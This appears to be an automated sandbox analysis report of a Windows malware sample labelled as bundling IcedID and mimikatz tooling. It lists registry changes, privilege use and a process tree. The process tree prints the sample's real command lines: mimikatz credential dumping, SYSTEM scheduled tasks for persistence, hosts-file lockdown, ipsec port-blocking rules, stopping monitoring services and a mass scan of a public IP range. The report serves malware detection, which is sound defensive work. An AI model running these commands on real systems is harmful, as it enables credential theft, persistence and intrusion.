\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language snutqkl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4992 cmd.exe 2812 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023c8a-6.dat nsis_installer_2 behavioral2/files/0x0011000000023ca2-15.dat nsis_installer_1 behavioral2/files/0x0011000000023ca2-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" snutqkl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ snutqkl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" snutqkl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing snutqkl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" snutqkl.exe Key created \REGISTRY\USER\.DEFAULT\Software iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" snutqkl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing iulpaulua.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" iulpaulua.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" snutqkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" snutqkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ snutqkl.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2812 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3844 schtasks.exe 212 schtasks.exe 2248 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3560 2024-11-06_9a77aabf80abf4cfa362212a02da0b89_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 3560 2024-11-06_9a77aabf80abf4cfa362212a02da0b89_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1588 snutqkl.exe Token: SeDebugPrivilege 2308 snutqkl.exe Token: SeDebugPrivilege 4460 vfshost.exe Token: SeDebugPrivilege 1784 iulpaulua.exe Token: SeLockMemoryPrivilege 4768 jtpawa.exe Token: SeLockMemoryPrivilege 4768 jtpawa.exe Token: SeDebugPrivilege 4952 iulpaulua.exe Token: SeDebugPrivilege 3312 iulpaulua.exe Token: SeDebugPrivilege 1252 iulpaulua.exe Token: SeDebugPrivilege 2204 iulpaulua.exe Token: SeDebugPrivilege 2236 iulpaulua.exe Token: SeDebugPrivilege 1888 iulpaulua.exe Token: SeDebugPrivilege 2000 iulpaulua.exe Token: SeDebugPrivilege 4520 iulpaulua.exe Token: SeDebugPrivilege 4748 iulpaulua.exe Token: SeDebugPrivilege 3588 iulpaulua.exe Token: SeDebugPrivilege 4968 iulpaulua.exe Token: SeDebugPrivilege 4480 iulpaulua.exe Token: SeDebugPrivilege 4800 iulpaulua.exe Token: SeDebugPrivilege 3132 iulpaulua.exe Token: SeDebugPrivilege 32 iulpaulua.exe Token: SeDebugPrivilege 1100 iulpaulua.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3560 2024-11-06_9a77aabf80abf4cfa362212a02da0b89_hacktools_icedid_mimikatz.exe 3560 2024-11-06_9a77aabf80abf4cfa362212a02da0b89_hacktools_icedid_mimikatz.exe 1588 snutqkl.exe 1588 snutqkl.exe 2308 snutqkl.exe 2308 snutqkl.exe 848 xohudmc.exe 3472 bgvdci.exe 2008 snutqkl.exe 2008 snutqkl.exe 2608 snutqkl.exe 2608 snutqkl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3560 wrote to memory of 4992 3560 2024-11-06_9a77aabf80abf4cfa362212a02da0b89_hacktools_icedid_mimikatz.exe 84 PID 3560 wrote to memory of 4992 3560 2024-11-06_9a77aabf80abf4cfa362212a02da0b89_hacktools_icedid_mimikatz.exe 84 PID 3560 wrote to memory of 4992 3560 2024-11-06_9a77aabf80abf4cfa362212a02da0b89_hacktools_icedid_mimikatz.exe 84 PID 4992 wrote to memory of 2812 4992 cmd.exe 86 PID 4992 wrote to memory of 2812 4992 cmd.exe 86 PID 4992 wrote to memory of 2812 4992 cmd.exe 86 PID 4992 wrote to memory of 1588 4992 cmd.exe 94 PID 4992 wrote to memory of 1588 4992 cmd.exe 94 PID 4992 wrote to memory of 1588 4992 cmd.exe 94 PID 2308 wrote to memory of 1124 2308 snutqkl.exe 96 PID 2308 wrote to memory of 1124 2308 snutqkl.exe 96 PID 2308 wrote to memory of 1124 2308 snutqkl.exe 96 PID 1124 wrote to memory of 5056 1124 cmd.exe 98 PID 1124 wrote to memory of 5056 1124 cmd.exe 98 PID 1124 wrote to memory of 5056 1124 cmd.exe 98 PID 1124 wrote to memory of 4316 1124 cmd.exe 99 PID 1124 wrote to memory of 4316 1124 cmd.exe 99 PID 1124 wrote to memory of 4316 1124 cmd.exe 99 PID 1124 wrote to memory of 4768 1124 cmd.exe 100 PID 1124 wrote to memory of 4768 1124 cmd.exe 100 PID 1124 wrote to memory of 4768 1124 cmd.exe 100 PID 1124 wrote to memory of 4636 1124 cmd.exe 101 PID 1124 wrote to memory of 4636 1124 cmd.exe 101 PID 1124 wrote to memory of 4636 1124 cmd.exe 101 PID 1124 wrote to memory of 2296 1124 cmd.exe 103 PID 1124 wrote to memory of 2296 1124 cmd.exe 103 PID 1124 wrote to memory of 2296 1124 cmd.exe 103 PID 1124 wrote to memory of 4840 1124 cmd.exe 104 PID 1124 wrote to memory of 4840 1124 cmd.exe 104 PID 1124 wrote to memory of 4840 1124 cmd.exe 104 PID 2308 wrote to memory of 3964 2308 snutqkl.exe 110 PID 2308 wrote to memory of 3964 2308 snutqkl.exe 110 PID 2308 wrote to memory of 3964 2308 snutqkl.exe 110 PID 2308 wrote to memory of 3772 2308 snutqkl.exe 113 PID 2308 wrote to memory of 3772 2308 snutqkl.exe 113 PID 2308 wrote to memory of 3772 2308 snutqkl.exe 113 PID 2308 wrote to memory of 4816 2308 snutqkl.exe 115 PID 2308 wrote to memory of 4816 2308 snutqkl.exe 115 PID 2308 wrote to memory of 4816 2308 snutqkl.exe 115 PID 2308 wrote to memory of 2280 2308 snutqkl.exe 117 PID 2308 wrote to memory of 2280 2308 snutqkl.exe 117 PID 2308 wrote to memory of 2280 2308 snutqkl.exe 117 PID 2280 wrote to memory of 452 2280 cmd.exe 119 PID 2280 wrote to memory of 452 2280 cmd.exe 119 PID 2280 wrote to memory of 452 2280 cmd.exe 119 PID 452 wrote to memory of 3580 452 wpcap.exe 120 PID 452 wrote to memory of 3580 452 wpcap.exe 120 PID 452 wrote to memory of 3580 452 wpcap.exe 120 PID 3580 wrote to memory of 3176 3580 net.exe 122 PID 3580 wrote to memory of 3176 3580 net.exe 122 PID 3580 wrote to memory of 3176 3580 net.exe 122 PID 452 wrote to memory of 5024 452 wpcap.exe 123 PID 452 wrote to memory of 5024 452 wpcap.exe 123 PID 452 wrote to memory of 5024 452 wpcap.exe 123 PID 5024 wrote to memory of 4072 5024 net.exe 125 PID 5024 wrote to memory of 4072 5024 net.exe 125 PID 5024 wrote to memory of 4072 5024 net.exe 125 PID 452 wrote to memory of 3900 452 wpcap.exe 126 PID 452 wrote to memory of 3900 452 wpcap.exe 126 PID 452 wrote to memory of 3900 452 wpcap.exe 126 PID 3900 wrote to memory of 2820 3900 net.exe 128 PID 3900 wrote to memory of 2820 3900 net.exe 128 PID 3900 wrote to memory of 2820 3900 net.exe 128 PID 452 wrote to memory of 4540 452 wpcap.exe 129
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2044
-
C:\Windows\TEMP\letltzgie\jtpawa.exe"C:\Windows\TEMP\letltzgie\jtpawa.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-06_9a77aabf80abf4cfa362212a02da0b89_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-06_9a77aabf80abf4cfa362212a02da0b89_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\fpibtvet\snutqkl.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2812
-
-
C:\Windows\fpibtvet\snutqkl.exeC:\Windows\fpibtvet\snutqkl.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1588
-
-
-
C:\Windows\fpibtvet\snutqkl.exeC:\Windows\fpibtvet\snutqkl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:5056
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4768
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:4636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2296
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4840
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3964
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3772
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4816
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mtemsclch\taatftcev\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\mtemsclch\taatftcev\wpcap.exeC:\Windows\mtemsclch\taatftcev\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:3176
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4072
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3900 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2820
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:4540 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2732
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4336 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2444 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3920
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4664
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2072 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1124
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mtemsclch\taatftcev\Scant.txt2⤵PID:4508
-
C:\Windows\mtemsclch\taatftcev\vltbbrlit.exeC:\Windows\mtemsclch\taatftcev\vltbbrlit.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mtemsclch\taatftcev\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mtemsclch\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mtemsclch\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1856 -
C:\Windows\mtemsclch\Corporate\vfshost.exeC:\Windows\mtemsclch\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dpibnnvii" /ru system /tr "cmd /c C:\Windows\ime\snutqkl.exe"2⤵
- System Location Discovery: System Language Discovery
PID:732 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "dpibnnvii" /ru system /tr "cmd /c C:\Windows\ime\snutqkl.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tvvutmlay" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1652 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tvvutmlay" /ru system /tr "cmd /c echo Y|cacls C:\Windows\fpibtvet\snutqkl.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2248
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zbalbiqht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2076 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zbalbiqht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\letltzgie\jtpawa.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:212
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4048
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:636
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2820
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3308
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3212
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4316
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
